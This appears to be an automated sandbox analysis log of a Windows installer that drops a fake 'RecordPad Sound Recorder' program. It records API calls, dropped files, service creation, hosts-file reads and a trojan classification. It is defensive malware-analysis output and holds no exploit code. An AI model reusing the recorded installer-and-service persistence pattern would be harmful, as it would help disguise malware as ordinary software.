                      Source: is-KI2RB.tmp.1.dr, is-RV2D1.tmp.1.dr, is-KU10K.tmp.1.dr, is-0C056.tmp.1.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                      Source: tOniaJ21lj.tmp, tOniaJ21lj.tmp, 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, tOniaJ21lj.tmp.0.dr, is-O2PKH.tmp.1.drString found in binary or memory: http://www.innosetup.com/
                      Source: tOniaJ21lj.exe, 00000000.00000003.2017542262.0000000002091000.00000004.00001000.00020000.00000000.sdmp, tOniaJ21lj.exe, 00000000.00000002.3269480886.0000000002091000.00000004.00001000.00020000.00000000.sdmp, tOniaJ21lj.exe, 00000000.00000003.2017464437.0000000002310000.00000004.00001000.00020000.00000000.sdmp, tOniaJ21lj.tmp, 00000001.00000003.2022441507.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, tOniaJ21lj.tmp, 00000001.00000002.3269794199.0000000002328000.00000004.00001000.00020000.00000000.sdmp, tOniaJ21lj.tmp, 00000001.00000003.2019413603.0000000002328000.00000004.00001000.00020000.00000000.sdmp, tOniaJ21lj.tmp, 00000001.00000003.2019304134.0000000003280000.00000004.00001000.00020000.00000000.sdmp, tOniaJ21lj.tmp, 00000001.00000002.3269392528.00000000006AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.mpegla.com
                      Source: tOniaJ21lj.exe, 00000000.00000003.2018211873.0000000002098000.00000004.00001000.00020000.00000000.sdmp, tOniaJ21lj.exe, 00000000.00000003.2017811455.0000000002310000.00000004.00001000.00020000.00000000.sdmp, tOniaJ21lj.tmp, tOniaJ21lj.tmp, 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, tOniaJ21lj.tmp.0.dr, is-O2PKH.tmp.1.drString found in binary or memory: http://www.remobjects.com/ps
                      Source: tOniaJ21lj.exe, 00000000.00000003.2018211873.0000000002098000.00000004.00001000.00020000.00000000.sdmp, tOniaJ21lj.exe, 00000000.00000003.2017811455.0000000002310000.00000004.00001000.00020000.00000000.sdmp, tOniaJ21lj.tmp, 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, tOniaJ21lj.tmp.0.dr, is-O2PKH.tmp.1.drString found in binary or memory: http://www.remobjects.com/psU
                      Source: is-UCHQL.tmp.1.drString found in binary or memory: http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0
                      Source: is-KI2RB.tmp.1.drString found in binary or memory: http://xml.org/sax/features/namespace-prefixes
                      Source: is-KI2RB.tmp.1.drString found in binary or memory: http://xml.org/sax/features/namespaces
                      Source: is-KI2RB.tmp.1.drString found in binary or memory: http://xml.org/sax/features/namespaceshttp://xml.org/sax/features/namespace-prefixeshttp://trolltech
                      Source: is-UTKLG.tmp.1.drString found in binary or memory: https://curl.haxx.se/V
                      Source: is-UTKLG.tmp.1.drString found in binary or memory: https://curl.haxx.se/docs/copyright.htmlD
                      Source: is-UTKLG.tmp.1.drString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
                      Source: is-6P98M.tmp.1.dr, is-8ECK7.tmp.1.dr, is-PRP4U.tmp.1.dr, is-VDBC5.tmp.1.dr, is-JNDNQ.tmp.1.dr, is-UTKLG.tmp.1.drString found in binary or memory: https://sectigo.com/CPS0
                      Source: is-UCHQL.tmp.1.drString found in binary or memory: https://www.ssl.com/repository0
                      Source: is-KI2RB.tmp.1.dr, is-RV2D1.tmp.1.dr, is-KU10K.tmp.1.dr, is-0C056.tmp.1.drString found in binary or memory: https://www.thawte.com/cps0/
                      Source: is-KI2RB.tmp.1.dr, is-RV2D1.tmp.1.dr, is-KU10K.tmp.1.dr, is-0C056.tmp.1.drString found in binary or memory: https://www.thawte.com/repository0W
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_0042EEF4 NtdllDefWindowProc_A,1_2_0042EEF4
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_00423AF4 NtdllDefWindowProc_A,1_2_00423AF4
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_00412548 NtdllDefWindowProc_A,1_2_00412548
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_00455800 PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,1_2_00455800
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_00473F28 NtdllDefWindowProc_A,1_2_00473F28
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_0042E6DC: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError,1_2_0042E6DC
                      Source: C:\Users\user\Desktop\tOniaJ21lj.exeCode function: 0_2_0040936C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_0040936C
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_00453FD0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,1_2_00453FD0
                      Source: C:\Users\user\Desktop\tOniaJ21lj.exeCode function: 0_2_004083300_2_00408330
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_0046C5C41_2_0046C5C4
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_00434CFC1_2_00434CFC
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_0047B5CE1_2_0047B5CE
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_00463B8C1_2_00463B8C
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_004822A01_2_004822A0
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_004884441_2_00488444
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_004444A41_2_004444A4
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_0045C87C1_2_0045C87C
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_004308A01_2_004308A0
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_00444B9C1_2_00444B9C
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_00444FA81_2_00444FA8
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_004813C81_2_004813C8
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_0043D7841_2_0043D784
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_004598501_2_00459850
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_00465BDC1_2_00465BDC
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_0042FD301_2_0042FD30
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_00443EFC1_2_00443EFC
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_00433FF81_2_00433FF8
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeCode function: 3_2_004010513_2_00401051
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeCode function: 3_2_00401C263_2_00401C26
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeCode function: 3_2_00406C873_2_00406C87
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeCode function: 4_2_004010514_2_00401051
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeCode function: 4_2_00401C264_2_00401C26
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeCode function: 4_2_00406C874_2_00406C87
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeCode function: 4_2_0260F0284_2_0260F028
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeCode function: 4_2_0261E1FD4_2_0261E1FD
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeCode function: 4_2_02622E244_2_02622E24
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeCode function: 4_2_0261E6154_2_0261E615
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeCode function: 4_2_02619EF44_2_02619EF4
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeCode function: 4_2_02624E994_2_02624E99
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeCode function: 4_2_026254104_2_02625410
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeCode function: 4_2_0261ACAA4_2_0261ACAA
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeCode function: 4_2_026184B24_2_026184B2
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeCode function: 4_2_0261DD094_2_0261DD09
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\RecordPad Sound Recorder\Qt5OpenGL.dll (copy) 7623B596CFD989413FEA2FE355607B029EF8E64067275CBF81863688128738B0
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeCode function: String function: 026253A0 appears 137 times
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeCode function: String function: 02618B50 appears 37 times
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: String function: 00405964 appears 103 times
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: String function: 00406A2C appears 38 times
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: String function: 0045618C appears 68 times
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: String function: 00403400 appears 59 times
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: String function: 00455F80 appears 95 times
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: String function: 00451F4C appears 88 times
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: String function: 0040785C appears 43 times
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: String function: 00408B74 appears 45 times
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: String function: 00403494 appears 84 times
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: String function: 00445808 appears 45 times
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: String function: 00445AD8 appears 59 times
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: String function: 00403684 appears 211 times
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: String function: 00433F10 appears 32 times
                      Source: tOniaJ21lj.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: tOniaJ21lj.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                      Source: tOniaJ21lj.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows
                      Source: tOniaJ21lj.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                      Source: tOniaJ21lj.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                      Source: tOniaJ21lj.tmp.0.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                      Source: is-O2PKH.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                      Source: is-O2PKH.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows
                      Source: is-O2PKH.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                      Source: is-O2PKH.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                      Source: is-O2PKH.tmp.1.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                      Source: is-VDBC5.tmp.1.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: tOniaJ21lj.exe, 00000000.00000003.2018211873.0000000002098000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs tOniaJ21lj.exe
                      Source: tOniaJ21lj.exe, 00000000.00000003.2017811455.0000000002310000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs tOniaJ21lj.exe
                      Source: tOniaJ21lj.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                      Source: recordpadsoundrecorder32.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: is-UCHQL.tmp.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: _RegDLL.tmp.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: UID Finder 6.11.66.exe.3.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: classification engineClassification label: mal100.troj.evad.winEXE@8/49@1/2
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeCode function: 4_2_02610870 _memset,FormatMessageA,GetLastError,FormatMessageA,GetLastError,4_2_02610870
                      Source: C:\Users\user\Desktop\tOniaJ21lj.exeCode function: 0_2_0040936C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_0040936C
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_00453FD0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,1_2_00453FD0
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_004547F8 GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA,1_2_004547F8
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeCode function: CreateServiceA,3_2_00402588
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeCode function: CreateServiceA,4_2_0040D117
                      Source: C:\Users\user\Desktop\tOniaJ21lj.exeCode function: 0_2_00409AD0 FindResourceA,SizeofResource,LoadResource,LockResource,0_2_00409AD0
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeCode function: 3_2_00402299 StartServiceCtrlDispatcherA,3_2_00402299
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeCode function: 3_2_00402299 StartServiceCtrlDispatcherA,3_2_00402299
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeCode function: 4_2_00402299 StartServiceCtrlDispatcherA,4_2_00402299
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile created: C:\Users\user\AppData\Local\RecordPad Sound RecorderJump to behavior
                      Source: C:\Users\user\Desktop\tOniaJ21lj.exeFile created: C:\Users\user\AppData\Local\Temp\is-A11IR.tmpJump to behavior
                      Source: Yara matchFile source: 3.0.recordpadsoundrecorder32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.recordpadsoundrecorder32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000000.2036104577.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.2033651879.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-OIVVM.tmp, type: DROPPED
                      Source: Yara matchFile source: C:\ProgramData\UID Finder 6.11.66\UID Finder 6.11.66.exe, type: DROPPED
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\tOniaJ21lj.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: tOniaJ21lj.exeReversingLabs: Detection: 21%
                      Source: C:\Users\user\Desktop\tOniaJ21lj.exeFile read: C:\Users\user\Desktop\tOniaJ21lj.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\tOniaJ21lj.exe "C:\Users\user\Desktop\tOniaJ21lj.exe"
                      Source: C:\Users\user\Desktop\tOniaJ21lj.exeProcess created: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp "C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp" /SL5="$10474,4719378,54272,C:\Users\user\Desktop\tOniaJ21lj.exe"
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpProcess created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe "C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe" -i
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpProcess created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe "C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe" -s
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                      Source: C:\Users\user\Desktop\tOniaJ21lj.exeProcess created: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp "C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp" /SL5="$10474,4719378,54272,C:\Users\user\Desktop\tOniaJ21lj.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpProcess created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe "C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe" -iJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpProcess created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe "C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe" -sJump to behavior
                      Source: C:\Users\user\Desktop\tOniaJ21lj.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\tOniaJ21lj.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpSection loaded: shfolder.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpSection loaded: msacm32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpSection loaded: winmmbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpSection loaded: winmmbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpSection loaded: riched20.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpSection loaded: usp10.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpSection loaded: msls31.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpSection loaded: explorerframe.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpSection loaded: sfc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
